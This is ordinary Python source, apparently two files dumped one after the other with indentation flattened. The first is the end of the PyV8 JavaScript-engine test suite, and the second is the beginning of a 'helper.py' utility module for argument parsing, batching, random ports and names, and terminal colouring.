def testCompile(self):
with JSContext() as ctxt:
with JSEngine() as engine:
s = engine.compile("1+2")
self.assertTrue(isinstance(s, _PyV8.JSScript))
self.assertEqual("1+2", s.source)
self.assertEqual(3, int(s.run()))
self.assertRaises(SyntaxError, engine.compile, "1+")
def testPrecompile(self):
with JSContext() as ctxt:
with JSEngine() as engine:
data = engine.precompile("1+2")
self.assertTrue(data)
self.assertEqual(28, len(data))
s = engine.compile("1+2", precompiled=data)
self.assertTrue(isinstance(s, _PyV8.JSScript))
self.assertEqual("1+2", s.source)
self.assertEqual(3, int(s.run()))
self.assertRaises(SyntaxError, engine.precompile, "1+")
def testUnicodeSource(self):
class Global(JSClass):
var = '测试'
def __getattr__(self, name):
if (name if is_py3k else name.decode('utf-8')) == '变量':
return self.var
return JSClass.__getattr__(self, name)
g = Global()
with JSContext(g) as ctxt:
with JSEngine() as engine:
src = """
function 函数() { return 变量.length; }
函数();
var func = function () {};
"""
data = engine.precompile(src)
self.assertTrue(data)
self.assertEqual(68, len(data))
s = engine.compile(src, precompiled=data)
self.assertTrue(isinstance(s, _PyV8.JSScript))
self.assertEqual(toNativeString(src), s.source)
self.assertEqual(2, s.run())
func_name = toNativeString('函数')
self.assertTrue(hasattr(ctxt.locals, func_name))
func = getattr(ctxt.locals, func_name)
self.assertTrue(isinstance(func, _PyV8.JSFunction))
self.assertEqual(func_name, func.name)
self.assertEqual("", func.resname)
self.assertEqual(1, func.linenum)
self.assertEqual(0, func.lineoff)
self.assertEqual(0, func.coloff)
var_name = toNativeString('变量')
setattr(ctxt.locals, var_name, '测试长字符串')
self.assertEqual(6, func())
self.assertEqual("func", ctxt.locals.func.inferredname)
def testExtension(self):
extSrc = """function hello(name) { return "hello " + name + " from javascript"; }"""
extJs = JSExtension("hello/javascript", extSrc)
self.assertTrue(extJs)
self.assertEqual("hello/javascript", extJs.name)
self.assertEqual(extSrc, extJs.source)
self.assertFalse(extJs.autoEnable)
self.assertTrue(extJs.registered)
TestEngine.extJs = extJs
with JSContext(extensions=['hello/javascript']) as ctxt:
self.assertEqual("hello flier from javascript", ctxt.eval("hello('flier')"))
# test the auto enable property
with JSContext() as ctxt:
self.assertRaises(ReferenceError, ctxt.eval, "hello('flier')")
extJs.autoEnable = True
self.assertTrue(extJs.autoEnable)
with JSContext() as ctxt:
self.assertEqual("hello flier from javascript", ctxt.eval("hello('flier')"))
extJs.autoEnable = False
self.assertFalse(extJs.autoEnable)
with JSContext() as ctxt:
self.assertRaises(ReferenceError, ctxt.eval, "hello('flier')")
extUnicodeSrc = """function helloW(name) { return "hello " + name + " from javascript"; }"""
extUnicodeJs = JSExtension("helloW/javascript", extUnicodeSrc)
self.assertTrue(extUnicodeJs)
self.assertEqual("helloW/javascript", extUnicodeJs.name)
self.assertEqual(toNativeString(extUnicodeSrc), extUnicodeJs.source)
self.assertFalse(extUnicodeJs.autoEnable)
self.assertTrue(extUnicodeJs.registered)
TestEngine.extUnicodeJs = extUnicodeJs
with JSContext(extensions=['helloW/javascript']) as ctxt:
self.assertEqual("hello flier from javascript", ctxt.eval("helloW('flier')"))
ret = ctxt.eval("helloW('世界')")
self.assertEqual("hello 世界 from javascript", ret if is_py3k else ret.decode('UTF-8'))
def testNativeExtension(self):
extSrc = "native function hello();"
extPy = JSExtension("hello/python", extSrc, lambda func: lambda name: "hello " + name + " from python", register=False)
self.assertTrue(extPy)
self.assertEqual("hello/python", extPy.name)
self.assertEqual(extSrc, extPy.source)
self.assertFalse(extPy.autoEnable)
self.assertFalse(extPy.registered)
extPy.register()
self.assertTrue(extPy.registered)
TestEngine.extPy = extPy
with JSContext(extensions=['hello/python']) as ctxt:
self.assertEqual("hello flier from python", ctxt.eval("hello('flier')"))
def _testSerialize(self):
data = None
self.assertFalse(JSContext.entered)
with JSContext() as ctxt:
self.assertTrue(JSContext.entered)
#ctxt.eval("function hello(name) { return 'hello ' + name; }")
data = JSEngine.serialize()
self.assertTrue(data)
self.assertTrue(len(data) > 0)
self.assertFalse(JSContext.entered)
#JSEngine.deserialize()
self.assertTrue(JSContext.entered)
self.assertEqual('hello flier', JSContext.current.eval("hello('flier');"))
def testEval(self):
with JSContext() as ctxt:
self.assertEqual(3, int(ctxt.eval("1+2")))
def testGlobal(self):
class Global(JSClass):
version = "1.0"
with JSContext(Global()) as ctxt:
vars = ctxt.locals
# getter
self.assertEqual(Global.version, str(vars.version))
self.assertEqual(Global.version, str(ctxt.eval("version")))
self.assertRaises(ReferenceError, ctxt.eval, "nonexists")
# setter
self.assertEqual(2.0, float(ctxt.eval("version = 2.0")))
self.assertEqual(2.0, float(vars.version))
def testThis(self):
class Global(JSClass):
version = 1.0
with JSContext(Global()) as ctxt:
self.assertEqual("[object Global]", str(ctxt.eval("this")))
self.assertEqual(1.0, float(ctxt.eval("this.version")))
def testObjectBuildInMethods(self):
class Global(JSClass):
version = 1.0
with JSContext(Global()) as ctxt:
self.assertEqual("[object Global]", str(ctxt.eval("this.toString()")))
self.assertEqual("[object Global]", str(ctxt.eval("this.toLocaleString()")))
self.assertEqual(Global.version, float(ctxt.eval("this.valueOf()").version))
self.assertTrue(bool(ctxt.eval("this.hasOwnProperty(\"version\")")))
self.assertFalse(ctxt.eval("this.hasOwnProperty(\"nonexistent\")"))
def testPythonWrapper(self):
class Global(JSClass):
s = [1, 2, 3]
d = {'a': {'b': 'c'}, 'd': ['e', 'f']}
g = Global()
with JSContext(g) as ctxt:
ctxt.eval("""
s[2] = s[1] + 2;
s[0] = s[1];
delete s[1];
""")
self.assertEqual([2, 4], g.s)
self.assertEqual('c', ctxt.eval("d.a.b"))
self.assertEqual(['e', 'f'], ctxt.eval("d.d"))
ctxt.eval("""
d.a.q = 4
delete d.d
""")
self.assertEqual(4, g.d['a']['q'])
self.assertEqual(None, ctxt.eval("d.d"))
def _testMemoryAllocationCallback(self):
alloc = {}
def callback(space, action, size):
alloc[(space, action)] = alloc.setdefault((space, action), 0) + size
JSEngine.setMemoryAllocationCallback(callback)
with JSContext() as ctxt:
self.assertFalse((JSObjectSpace.Code, JSAllocationAction.alloc) in alloc)
ctxt.eval("var o = new Array(1000);")
self.assertTrue((JSObjectSpace.Code, JSAllocationAction.alloc) in alloc)
JSEngine.setMemoryAllocationCallback(None)
class TestDebug(unittest.TestCase):
def setUp(self):
self.engine = JSEngine()
def tearDown(self):
del self.engine
events = []
def processDebugEvent(self, event):
try:
logging.debug("receive debug event: %s", repr(event))
self.events.append(repr(event))
except:
logging.error("fail to process debug event")
logging.debug(traceback.extract_stack())
def testEventDispatch(self):
debugger = JSDebugger()
self.assertTrue(not debugger.enabled)
debugger.onBreak = lambda evt: self.processDebugEvent(evt)
debugger.onException = lambda evt: self.processDebugEvent(evt)
debugger.onNewFunction = lambda evt: self.processDebugEvent(evt)
debugger.onBeforeCompile = lambda evt: self.processDebugEvent(evt)
debugger.onAfterCompile = lambda evt: self.processDebugEvent(evt)
with JSContext() as ctxt:
debugger.enabled = True
self.assertEqual(3, int(ctxt.eval("function test() { text = \"1+2\"; return eval(text) } test()")))
debugger.enabled = False
self.assertRaises(JSError, JSContext.eval, ctxt, "throw 1")
self.assertTrue(not debugger.enabled)
self.assertEqual(4, len(self.events))
class TestProfile(unittest.TestCase):
def _testStart(self):
self.assertFalse(profiler.started)
profiler.start()
self.assertTrue(profiler.started)
profiler.stop()
self.assertFalse(profiler.started)
def _testResume(self):
self.assertTrue(profiler.paused)
self.assertEqual(profiler.Modules.cpu, profiler.modules)
profiler.resume()
profiler.resume(profiler.Modules.heap)
# TODO enable profiler with resume
#self.assertFalse(profiler.paused)
class TestAST(unittest.TestCase):
class Checker(object):
def __init__(self, testcase):
self.testcase = testcase
self.called = []
def __enter__(self):
self.ctxt = JSContext()
self.ctxt.enter()
return self
def __exit__(self, exc_type, exc_value, traceback):
self.ctxt.leave()
def __getattr__(self, name):
return getattr(self.testcase, name)
def test(self, script):
JSEngine().compile(script).visit(self)
return self.called
def onProgram(self, prog):
self.ast = prog.toAST()
self.json = json.loads(prog.toJSON())
for decl in prog.scope.declarations:
decl.visit(self)
for stmt in prog.body:
stmt.visit(self)
def onBlock(self, block):
for stmt in block.statements:
stmt.visit(self)
def onExpressionStatement(self, stmt):
stmt.expression.visit(self)
#print type(stmt.expression), stmt.expression
def testBlock(self):
class BlockChecker(TestAST.Checker):
def onBlock(self, stmt):
self.called.append('block')
self.assertEqual(AST.NodeType.Block, stmt.type)
self.assertTrue(stmt.initializerBlock)
self.assertFalse(stmt.anonymous)
target = stmt.breakTarget
self.assertTrue(target)
self.assertFalse(target.bound)
self.assertTrue(target.unused)
self.assertFalse(target.linked)
self.assertEqual(2, len(stmt.statements))
self.assertEqual(['%InitializeVarGlobal("i", 0);', '%InitializeVarGlobal("j", 0);'], [str(s) for s in stmt.statements])
with BlockChecker(self) as checker:
self.assertEqual(['block'], checker.test("var i, j;"))
self.assertEqual("""FUNC
. NAME ""
. INFERRED NAME ""
. DECLS
. . VAR "i"
. . VAR "j"
. BLOCK INIT
. . CALL RUNTIME InitializeVarGlobal
. . . LITERAL "i"
. . . LITERAL 0
. . CALL RUNTIME InitializeVarGlobal
. . . LITERAL "j"
. . . LITERAL 0
""", checker.ast)
self.assertEqual(['FunctionLiteral', {'name': ''},
['Declaration', {'mode': 'VAR'},
['Variable', {'name': 'i'}]
], ['Declaration', {'mode':'VAR'},
['Variable', {'name': 'j'}]
], ['Block',
['ExpressionStatement', ['CallRuntime', {'name': 'InitializeVarGlobal'},
['Literal', {'handle':'i'}],
['Literal', {'handle': 0}]]],
['ExpressionStatement', ['CallRuntime', {'name': 'InitializeVarGlobal'},
['Literal', {'handle': 'j'}],
['Literal', {'handle': 0}]]]
]
], checker.json)
def testIfStatement(self):
class IfStatementChecker(TestAST.Checker):
def onIfStatement(self, stmt):
self.called.append('if')
self.assertTrue(stmt)
self.assertEqual(AST.NodeType.IfStatement, stmt.type)
self.assertEqual(7, stmt.pos)
stmt.pos = 100
self.assertEqual(100, stmt.pos)
self.assertTrue(stmt.hasThenStatement)
self.assertTrue(stmt.hasElseStatement)
self.assertEqual("((value % 2) == 0)", str(stmt.condition))
self.assertEqual("{ s = \"even\"; }", str(stmt.thenStatement))
self.assertEqual("{ s = \"odd\"; }", str(stmt.elseStatement))
self.assertFalse(stmt.condition.isPropertyName)
with IfStatementChecker(self) as checker:
self.assertEqual(['if'], checker.test("var s; if (value % 2 == 0) { s = 'even'; } else { s = 'odd'; }"))
def testForStatement(self):
class ForStatementChecker(TestAST.Checker):
def onForStatement(self, stmt):
self.called.append('for')
self.assertEqual("{ j += i; }", str(stmt.body))
self.assertEqual("i = 0;", str(stmt.init))
self.assertEqual("(i < 10)", str(stmt.condition))
self.assertEqual("(i++);", str(stmt.nextStmt))
target = stmt.continueTarget
self.assertTrue(target)
self.assertFalse(target.bound)
self.assertTrue(target.unused)
self.assertFalse(target.linked)
self.assertFalse(stmt.fastLoop)
def onForInStatement(self, stmt):
self.called.append('forIn')
self.assertEqual("{ out += name; }", str(stmt.body))
self.assertEqual("name", str(stmt.each))
self.assertEqual("names", str(stmt.enumerable))
def onWhileStatement(self, stmt):
self.called.append('while')
self.assertEqual("{ i += 1; }", str(stmt.body))
self.assertEqual("(i < 10)", str(stmt.condition))
def onDoWhileStatement(self, stmt):
self.called.append('doWhile')
self.assertEqual("{ i += 1; }", str(stmt.body))
self.assertEqual("(i < 10)", str(stmt.condition))
self.assertEqual(281, stmt.conditionPos)
with ForStatementChecker(self) as checker:
self.assertEqual(['for', 'forIn', 'while', 'doWhile'], checker.test("""
var i, j;
for (i=0; i<10; i++) { j+=i; }
var names = new Array();
var out = '';
for (name in names) { out += name; }
while (i<10) { i += 1; }
do { i += 1; } while (i<10);
"""))
def testCallStatements(self):
class CallStatementChecker(TestAST.Checker):
def onVariableDeclaration(self, decl):
self.called.append('var')
var = decl.proxy
if var.name == 's':
self.assertEqual(AST.VarMode.var, decl.mode)
self.assertTrue(var.isValidLeftHandSide)
self.assertFalse(var.isArguments)
self.assertFalse(var.isThis)
def onFunctionDeclaration(self, decl):
self.called.append('func')
var = decl.proxy
if var.name == 'hello':
self.assertEqual(AST.VarMode.var, decl.mode)
self.assertTrue(decl.function)
self.assertEqual('(function hello(name) { s = ("Hello " + name); })', str(decl.function))
elif var.name == 'dog':
self.assertEqual(AST.VarMode.var, decl.mode)
self.assertTrue(decl.function)
self.assertEqual('(function dog(name) { (this).name = name; })', str(decl.function))
def onCall(self, expr):
self.called.append('call')
self.assertEqual("hello", str(expr.expression))
self.assertEqual(['"flier"'], [str(arg) for arg in expr.args])
self.assertEqual(159, expr.pos)
def onCallNew(self, expr):
self.called.append('callNew')
self.assertEqual("dog", str(expr.expression))
self.assertEqual(['"cat"'], [str(arg) for arg in expr.args])
self.assertEqual(191, expr.pos)
def onCallRuntime(self, expr):
self.called.append('callRuntime')
self.assertEqual("InitializeVarGlobal", expr.name)
self.assertEqual(['"s"', '0'], [str(arg) for arg in expr.args])
self.assertFalse(expr.isJsRuntime)
with CallStatementChecker(self) as checker:
self.assertEqual(['var', 'func', 'func', 'callRuntime', 'call', 'callNew'], checker.test("""
var s;
function hello(name) { s = "Hello " + name; }
function dog(name) { this.name = name; }
hello("flier");
new dog("cat");
"""))
def testTryStatements(self):
class TryStatementsChecker(TestAST.Checker):
def onThrow(self, expr):
self.called.append('try')
self.assertEqual('"abc"', str(expr.exception))
self.assertEqual(66, expr.pos)
def onTryCatchStatement(self, stmt):
self.called.append('catch')
self.assertEqual("{ throw \"abc\"; }", str(stmt.tryBlock))
#FIXME self.assertEqual([], stmt.targets)
stmt.tryBlock.visit(self)
self.assertEqual("err", str(stmt.variable.name))
self.assertEqual("{ s = err; }", str(stmt.catchBlock))
def onTryFinallyStatement(self, stmt):
self.called.append('finally')
self.assertEqual("{ throw \"abc\"; }", str(stmt.tryBlock))
#FIXME self.assertEqual([], stmt.targets)
self.assertEqual("{ s += \".\"; }", str(stmt.finallyBlock))
with TryStatementsChecker(self) as checker:
self.assertEqual(['catch', 'try', 'finally'], checker.test("""
var s;
try {
throw "abc";
}
catch (err) {
s = err;
};
try {
throw "abc";
}
finally {
s += ".";
}
"""))
def testLiterals(self):
class LiteralChecker(TestAST.Checker):
def onCallRuntime(self, expr):
expr.args[1].visit(self)
def onLiteral(self, litr):
self.called.append('literal')
self.assertFalse(litr.isPropertyName)
self.assertFalse(litr.isNull)
self.assertFalse(litr.isTrue)
def onRegExpLiteral(self, litr):
self.called.append('regex')
self.assertEqual("test", litr.pattern)
self.assertEqual("g", litr.flags)
def onObjectLiteral(self, litr):
self.called.append('object')
self.assertEqual('constant:"name"="flier",constant:"sex"=true',
",".join(["%s:%s=%s" % (prop.kind, prop.key, prop.value) for prop in litr.properties]))
def onArrayLiteral(self, litr):
self.called.append('array')
self.assertEqual('"hello","world",42',
",".join([str(value) for value in litr.values]))
with LiteralChecker(self) as checker:
self.assertEqual(['literal', 'regex', 'literal', 'literal'], checker.test("""
false;
/test/g;
var o = { name: 'flier', sex: true };
var a = ['hello', 'world', 42];
"""))
def testOperations(self):
class OperationChecker(TestAST.Checker):
def onUnaryOperation(self, expr):
self.called.append('unaryOp')
self.assertEqual(AST.Op.BIT_NOT, expr.op)
self.assertEqual("i", expr.expression.name)
#print "unary", expr
def onIncrementOperation(self, expr):
self.fail()
def onBinaryOperation(self, expr):
self.called.append('binOp')
self.assertEqual(AST.Op.ADD, expr.op)
self.assertEqual("i", str(expr.left))
self.assertEqual("j", str(expr.right))
self.assertEqual(36, expr.pos)
#print "bin", expr
def onAssignment(self, expr):
self.called.append('assign')
self.assertEqual(AST.Op.ASSIGN_ADD, expr.op)
self.assertEqual(AST.Op.ADD, expr.binop)
self.assertEqual("i", str(expr.target))
self.assertEqual("1", str(expr.value))
self.assertEqual(53, expr.pos)
self.assertEqual("(i + 1)", str(expr.binOperation))
self.assertTrue(expr.compound)
def onCountOperation(self, expr):
self.called.append('countOp')
self.assertFalse(expr.prefix)
self.assertTrue(expr.postfix)
self.assertEqual(AST.Op.INC, expr.op)
self.assertEqual(AST.Op.ADD, expr.binop)
self.assertEqual(71, expr.pos)
self.assertEqual("i", expr.expression.name)
#print "count", expr
def onCompareOperation(self, expr):
self.called.append('compOp')
if len(self.called) == 4:
self.assertEqual(AST.Op.EQ, expr.op)
self.assertEqual(88, expr.pos) # i==j
else:
self.assertEqual(AST.Op.EQ_STRICT, expr.op)
self.assertEqual(106, expr.pos) # i===j
self.assertEqual("i", str(expr.left))
self.assertEqual("j", str(expr.right))
#print "comp", expr
def onConditional(self, expr):
self.called.append('conditional')
self.assertEqual("(i > j)", str(expr.condition))
self.assertEqual("i", str(expr.thenExpr))
self.assertEqual("j", str(expr.elseExpr))
self.assertEqual(144, expr.thenExprPos)
self.assertEqual(146, expr.elseExprPos)
with OperationChecker(self) as checker:
self.assertEqual(['binOp', 'assign', 'countOp', 'compOp', 'compOp', 'unaryOp', 'conditional'], checker.test("""
var i, j;
i+j;
i+=1;
i++;
i==j;
i===j;
~i;
i>j?i:j;
"""))
def testSwitchStatement(self):
class SwitchStatementChecker(TestAST.Checker):
def onSwitchStatement(self, stmt):
self.called.append('switch')
self.assertEqual('expr', stmt.tag.name)
self.assertEqual(2, len(stmt.cases))
case = stmt.cases[0]
self.assertFalse(case.isDefault)
self.assertTrue(case.label.isString)
self.assertEqual(0, case.bodyTarget.pos)
self.assertEqual(57, case.position)
self.assertEqual(1, len(case.statements))
case = stmt.cases[1]
self.assertTrue(case.isDefault)
self.assertEqual(None, case.label)
self.assertEqual(0, case.bodyTarget.pos)
self.assertEqual(109, case.position)
self.assertEqual(1, len(case.statements))
with SwitchStatementChecker(self) as checker:
self.assertEqual(['switch'], checker.test("""
switch (expr) {
case 'flier':
break;
default:
break;
}
"""))
if __name__ == '__main__':
if "-v" in sys.argv:
level = logging.DEBUG
else:
level = logging.WARN
if "-p" in sys.argv:
sys.argv.remove("-p")
print("Press any key to continue or attach process #%d..." % os.getpid())
input()
logging.basicConfig(level=level, format='%(asctime)s %(levelname)s %(message)s')
logging.info("testing PyV8 module %s with V8 v%s", __version__, JSEngine.version)
unittest.main()
|
helper.py
|
import asyncio
import functools
import json
import math
import os
import random
import re
import sys
import threading
import time
import uuid
import warnings
from argparse import ArgumentParser, Namespace
from datetime import datetime
from itertools import islice
from types import SimpleNamespace
from typing import (
Tuple,
Optional,
Iterator,
Any,
Union,
List,
Dict,
Set,
Sequence,
Iterable,
)
__all__ = [
'batch_iterator',
'parse_arg',
'random_port',
'random_identity',
'random_uuid',
'expand_env_var',
'colored',
'ArgNamespace',
'is_valid_local_config_source',
'cached_property',
'typename',
'get_public_ip',
'get_internal_ip',
'convert_tuple_to_list',
'run_async',
'deprecated_alias',
'countdown',
]
def deprecated_alias(**aliases):
"""
Usage, kwargs with key as the deprecated arg name and value be a tuple, (new_name, deprecate_level).
With level 0 means warning, level 1 means exception.
For example:
.. highlight:: python
.. code-block:: python
@deprecated_alias(input_fn=('inputs', 0), buffer=('input_fn', 0), callback=('on_done', 1), output_fn=('on_done', 1))
:param aliases: maps aliases to new arguments
:return: wrapper
"""
from .excepts import NotSupportedError
def _rename_kwargs(func_name: str, kwargs, aliases):
"""
Raise warnings or exceptions for deprecated arguments.
:param func_name: Name of the function.
:param kwargs: key word arguments from the function which is decorated.
:param aliases: kwargs with key as the deprecated arg name and value be a tuple, (new_name, deprecate_level).
"""
for alias, new_arg in aliases.items():
if not isinstance(new_arg, tuple):
raise ValueError(
f'{new_arg} must be a tuple, with first element as the new name, '
f'second element as the deprecated level: 0 as warning, 1 as exception'
)
if alias in kwargs:
new_name, dep_level = new_arg
if new_name in kwargs:
raise NotSupportedError(
f'{func_name} received both {alias} and {new_name}'
)
if dep_level == 0:
warnings.warn(
f'`{alias}` is renamed to `{new_name}` in `{func_name}()`, the usage of `{alias}` is '
f'deprecated and will be removed in the next version.',
DeprecationWarning,
)
kwargs[new_name] = kwargs.pop(alias)
elif dep_level == 1:
raise NotSupportedError(f'{alias} has been renamed to `{new_name}`')
def deco(f):
"""
Set Decorator function.
:param f: function the decorator is used for
:return: wrapper
"""
@functools.wraps(f)
def wrapper(*args, **kwargs):
"""
Set wrapper function.
:param args: wrapper arguments
:param kwargs: wrapper key word arguments
:return: result of renamed function.
"""
_rename_kwargs(f.__name__, kwargs, aliases)
return f(*args, **kwargs)
return wrapper
return deco
def get_readable_size(num_bytes: Union[int, float]) -> str:
"""
Transform the bytes into readable value with different units (e.g. 1 KB, 20 MB, 30.1 GB).
:param num_bytes: Number of bytes.
:return: Human readable string representation.
"""
num_bytes = int(num_bytes)
if num_bytes < 1024:
return f'{num_bytes} Bytes'
elif num_bytes < 1024 ** 2:
return f'{num_bytes / 1024:.1f} KB'
elif num_bytes < 1024 ** 3:
return f'{num_bytes / (1024 ** 2):.1f} MB'
else:
return f'{num_bytes / (1024 ** 3):.1f} GB'
def batch_iterator(
data: Iterable[Any],
batch_size: int,
axis: int = 0,
) -> Iterator[Any]:
"""
Get an iterator of batches of data.
For example:
.. highlight:: python
.. code-block:: python
for req in batch_iterator(data, batch_size, split_over_axis):
# Do something with batch
:param data: Data source.
:param batch_size: Size of one batch.
:param axis: Determine which axis to iterate for np.ndarray data.
:yield: data
:return: An Iterator of batch data.
"""
import numpy as np
if not batch_size or batch_size <= 0:
yield data
return
if isinstance(data, np.ndarray):
_l = data.shape[axis]
_d = data.ndim
sl = [slice(None)] * _d
if batch_size >= _l:
yield data
return
for start in range(0, _l, batch_size):
end = min(_l, start + batch_size)
sl[axis] = slice(start, end)
yield data[tuple(sl)]
elif isinstance(data, Sequence):
if batch_size >= len(data):
yield data
return
for _ in range(0, len(data), batch_size):
yield data[_ : _ + batch_size]
elif isinstance(data, Iterable):
# as iterator, there is no way to know the length of it
while True:
chunk = tuple(islice(data, batch_size))
if not chunk:
return
yield chunk
else:
raise TypeError(f'unsupported type: {type(data)}')
def parse_arg(v: str) -> Optional[Union[bool, int, str, list, float]]:
"""
Parse the arguments from string to `Union[bool, int, str, list, float]`.
:param v: The string of arguments
:return: The parsed arguments list.
"""
m = re.match(r'^[\'"](.*)[\'"]$', v)
if m:
return m.group(1)
if v.startswith('[') and v.endswith(']'):
# function args must be immutable tuples not list
tmp = v.replace('[', '').replace(']', '').strip().split(',')
if len(tmp) > 0:
return [parse_arg(vv.strip()) for vv in tmp]
else:
return []
try:
v = int(v) # parse int parameter
except ValueError:
try:
v = float(v) # parse float parameter
except ValueError:
if len(v) == 0:
# ignore it when the parameter is empty
v = None
elif v.lower() == 'true': # parse boolean parameter
v = True
elif v.lower() == 'false':
v = False
return v
def countdown(t: int, reason: str = 'I am blocking this thread') -> None:
"""
Display the countdown in console.
For example:
.. highlight:: python
.. code-block:: python
countdown(10, reason=colored('re-fetch access token', 'cyan', attrs=['bold', 'reverse']))
:param t: Countdown time.
:param reason: A string message of reason for this Countdown.
"""
try:
sys.stdout.write('\n')
sys.stdout.flush()
while t > 0:
t -= 1
msg = f'⏳ {colored("%3d" % t, "yellow")}s left: {reason}'
sys.stdout.write(f'\r{msg}')
sys.stdout.flush()
time.sleep(1)
sys.stdout.write('\n')
sys.stdout.flush()
except KeyboardInterrupt:
sys.stdout.write('no more patience? good bye!')
_random_names = (
(
'first',
'great',
'local',
'small',
'right',
'large',
'young',
'early',
'major',
'clear',
'black',
'whole',
'third',
'white',
'short',
'human',
'royal',
'wrong',
'legal',
'final',
'close',
'total',
'prime',
'happy',
'sorry',
'basic',
'aware',
'ready',
'green',
'heavy',
'extra',
'civil',
'chief',
'usual',
'front',
'fresh',
'joint',
'alone',
'rural',
'light',
'equal',
'quiet',
'quick',
'daily',
'urban',
'upper',
'moral',
'vital',
'empty',
'brief',
),
(
'world',
'house',
'place',
'group',
'party',
'money',
'point',
'state',
'night',
'water',
'thing',
'order',
'power',
'court',
'level',
'child',
'south',
'staff',
'woman',
'north',
'sense',
'death',
'range',
'table',
'trade',
'study',
'other',
'price',
'class',
'union',
'value',
'paper',
'right',
'voice',
'stage',
'light',
'march',
'board',
'month',
'music',
'field',
'award',
'issue',
'basis',
'front',
'heart',
'force',
'model',
'space',
'peter',
),
)
def random_name() -> str:
"""
Generate a random name from list.
:return: A Random name.
"""
return '_'.join(random.choice(_random_names[j]) for j in range(2))
def random_port() -> Optional[int]:
"""
Get a random available port number from '49153' to '65535'.
:return: A random port.
"""
import threading
import multiprocessing
from contextlib import closing
import socket
def _get_port(port=0):
with multiprocessing.Lock():
with threading.Lock():
with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
try:
s.bind(('', port))
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
return s.getsockname()[1]
except OSError:
pass
_port = None
if 'JINA_RANDOM_PORT_MIN' in os.environ or 'JINA_RANDOM_PORT_MAX' in os.environ:
min_port = int(os.environ.get('JINA_RANDOM_PORT_MIN', '49153'))
max_port = int(os.environ.get('JINA_RANDOM_PORT_MAX', '65535'))
all_ports = list(range(min_port, max_port + 1))
random.shuffle(all_ports)
for _port in all_ports:
if _get_port(_port) is not None:
break
else:
raise OSError(
f'can not find an available port between [{min_port}, {max_port}].'
)
else:
_port = _get_port()
return int(_port)
def random_identity(use_uuid1: bool = False) -> str:
"""
Generate random UUID.
..note::
A MAC address or time-based ordering (UUID1) can afford increased database performance, since it's less work
to sort numbers closer-together than those distributed randomly (UUID4) (see here).
A second related issue, is that using UUID1 can be useful in debugging, even if origin data is lost or not
explicitly stored.
:param use_uuid1: use UUID1 instead of UUID4. This is the default Document ID generator.
:return: A random UUID.
"""
return str(random_uuid(use_uuid1))
def random_uuid(use_uuid1: bool = False) -> uuid.UUID:
"""
Get a random UUID.
:param use_uuid1: Use UUID1 if True, else use UUID4.
:return: A random UUID.
"""
return uuid.uuid1() if use_uuid1 else uuid.uuid4()
def expand_env_var(v: str) -> Optional[Union[bool, int, str, list, float]]:
"""
Expand the environment variables.
:param v: String of environment variables.
:return: Parsed environment variables.
"""
if isinstance(v, str):
return parse_arg(os.path.expandvars(v))
else:
return v
def expand_dict(
d: Dict, expand_fn=expand_env_var, resolve_cycle_ref=True
) -> Dict[str, Any]:
"""
Expand variables from YAML file.
:param d: Target Dict.
:param expand_fn: Parsed environment variables.
:param resolve_cycle_ref: Defines if cyclic references should be resolved.
:return: Expanded variables.
"""
expand_map = SimpleNamespace()
pat = re.compile(r'{.+}|\$[a-zA-Z0-9_]*\b')
def _scan(sub_d: Union[Dict, List], p):
if isinstance(sub_d, dict):
for k, v in sub_d.items():
if isinstance(v, dict):
p.__dict__[k] = SimpleNamespace()
_scan(v, p.__dict__[k])
elif isinstance(v, list):
p.__dict__[k] = list()
_scan(v, p.__dict__[k])
else:
p.__dict__[k] = v
elif isinstance(sub_d, list):
for idx, v in enumerate(sub_d):
if isinstance(v, dict):
p.append(SimpleNamespace())
_scan(v, p[idx])
elif isinstance(v, list):
p.append(list())
_scan(v, p[idx])
else:
p.append(v)
def _replace(sub_d: Union[Dict, List], p):
if isinstance(sub_d, Dict):
for k, v in sub_d.items():
if isinstance(v, (dict, list)):
_replace(v, p.__dict__[k])
else:
if isinstance(v, str) and pat.findall(v):
sub_d[k] = _sub(v, p)
elif isinstance(sub_d, List):
for idx, v in enumerate(sub_d):
if isinstance(v, (dict, list)):
_replace(v, p[idx])
else:
if isinstance(v, str) and pat.findall(v):
sub_d[idx] = _sub(v, p)
def _sub(v, p):
if resolve_cycle_ref:
try:
v = v.format(root=expand_map, this=p)
except KeyError:
pass
return expand_fn(v)
_scan(d, expand_map)
_replace(d, expand_map)
return d
_ATTRIBUTES = {
'bold': 1,
'dark': 2,
'underline': 4,
'blink': 5,
'reverse': 7,
'concealed': 8,
}
_HIGHLIGHTS = {
'on_grey': 40,
'on_red': 41,
'on_green': 42,
'on_yellow': 43,
'on_blue': 44,
'on_magenta': 45,
'on_cyan': 46,
'on_white': 47,
}
_COLORS = {
'black': 30,
'red': 31,
'green': 32,
'yellow': 33,
'blue': 34,
'magenta': 35,
'cyan': 36,
'white': 37,
}
_RESET = '\033[0m'
if os.name == 'nt':
os.system('color')
def colored(
text: str,
color: Optional[str] = None,
on_color: Optional[str] = None,
attrs: Optional[Union[str, list]] = None,
) -> str:
"""
Give the text with color.
:param text: The target text.
:param color: The color of text. Chosen from the following.
{
'grey': 30,
'red': 31,
'green': 32,
'yellow': 33,
'blue': 34,
'magenta': 35,
'cyan': 36,
'white': 37
}
:param on_color: The on_color of text. Chosen from the following.
{
'on_grey': 40,
'on_red': 41,
'on_green': 42,
'on_yellow': 43,
'on_blue': 44,
'on_magenta': 45,
'on_cyan': 46,
'on_white': 47
}
:param attrs: Attributes of color. Chosen from the following.
{
'bold': 1,
'dark': 2,
'underline': 4,
'blink': 5,
'reverse': 7,
'concealed': 8
}
:return: Colored text.
"""
if 'JINA_LOG_NO_COLOR' not in os.environ:
fmt_str = '\033[%dm%s'
if color:
text = fmt_str % (_COLORS[color], text)
if on_color:
text = fmt_str % (_HIGHLIGHTS[on_color], text)
if attrs:
if isinstance(attrs, str):
attrs = [attrs]
if isinstance(attrs, list):
for attr in attrs:
text = fmt_str % (_ATTRIBUTES[attr], text)
text += _RESET
return text
class ColorContext:
def __init__(self, color: str, bold: Optional[bool] = False):
self._color = color
self._bold = bold
def __enter__(self):
if self._bold:
fmt_str = '\033[1;%dm'
else:
fmt_str = '\033[0;%dm'
c = fmt_str % (_COLORS[self._color])
print(c, flush=True, end='')
return self
def __exit__(self, typ, value, traceback):
print(_RESET, flush=True, end='')
class ArgNamespace:
"""Helper function for argparse.Namespace object."""
@staticmethod
def kwargs2list(kwargs: Dict) -> List[str]:
"""
Convert dict to an argparse-friendly list.
